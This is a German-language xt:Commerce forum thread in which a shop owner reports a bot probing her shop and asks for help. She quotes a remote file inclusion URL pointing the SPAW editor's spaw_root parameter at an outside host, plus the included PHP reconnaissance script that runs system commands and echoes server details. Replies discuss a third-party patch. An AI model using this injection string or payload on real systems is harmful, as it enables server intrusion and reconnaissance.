Jump to content
xt:Commerce Community Forum
Sign in to follow this  
marama

Hackerangriff spaw_control_.class.php???

Recommended Posts

Hallo,

bei mir marschiert gerade ein bot durch den Shop der alle Seiten mit

/reviews.php?language=fr/////admin/includes/classes/spaw/spaw_control.class.php?spaw_root=http://indo.home.ro/idscan.txt???

auf allen Seiten durchrackert.

Ich nehme an das ist ein hacker... auf welche Sicherheitslücke zielt der ab? Sollte ich da eine bestimmte Lücke nochmal prüfen?

Vielen Dank,

Martina

Nachtrag: Die http://indo.home.ro/idscan.txt enthält

echo "ALBANIA<br>";

$alb = @php_uname();

$alb2 = system(uptime);

$alb3 = system(id);

$alb4 = @getcwd();

$alb5 = getenv("SERVER_SOFTWARE");

$alb6 = phpversion();

$alb7 = $_SERVER['SERVER_NAME'];

$alb8 = gethostbyname($SERVER_ADDR);

$alb9 = get_current_user();

$os = @PHP_OS;

echo "os: $os<br>";

echo "uname -a: $alb<br>";

echo "uptime: $alb2<br>";

echo "id: $alb3<br>";

echo "pwd: $alb4<br>";

echo "user: $alb9<br>";

echo "phpv: $alb6<br>";

echo "SoftWare: $alb5<br>";

echo "ServerName: $alb7<br>";

echo "ServerAddr: $alb8<br>";

echo "ALBANIA;br>";

exit;

Share this post


Link to post
Share on other sites

... sorry, ich kann keinen neuen Tread aufmachen ... da stimmt was mit meinen Rechten nicht.

Im Netz bin ich aber auf einen Sicherheitspatch von Ruhrmedia gestoßen, der eine aktuelle Sicherheitslücke vom xtc (alle xtCommerce-Versionen ab 3.0.2 ) schließen soll.

WARUM findet man hier im Forum keinen Hinweis auf eine Lücke ?

Infos unter ruhrmedia .de

????

Share this post


Link to post
Share on other sites

Weils keine Lücke augenscheinlich gibt.

Die SuFu liefert dafür folgendes, was du hättest finden müssen:

http://www.xt-commerce.com/forum/allgemeine-diskussionen/75425-neues-sicherheitsloch-von-gambio-auch-xtc.html

Derzeit ist uns kein funktionierender Exploit bekannt.

Eine Behebung wie bei diesem Patch vorgeschlagen, würde ein (wenn) existstendes Problem auch nicht vollständig Lösen.

Wenn jemand einen Funktionierenden Exploit hat, kan ner uns diesen gerne senden und wir überprüfen dies.

In dem Thread ging es genau darum, das rote ist übrigens mein Suchbegriff;)

Edited by Fry

Share this post


Link to post
Share on other sites
Sign in to follow this  

×
×
  • Create New...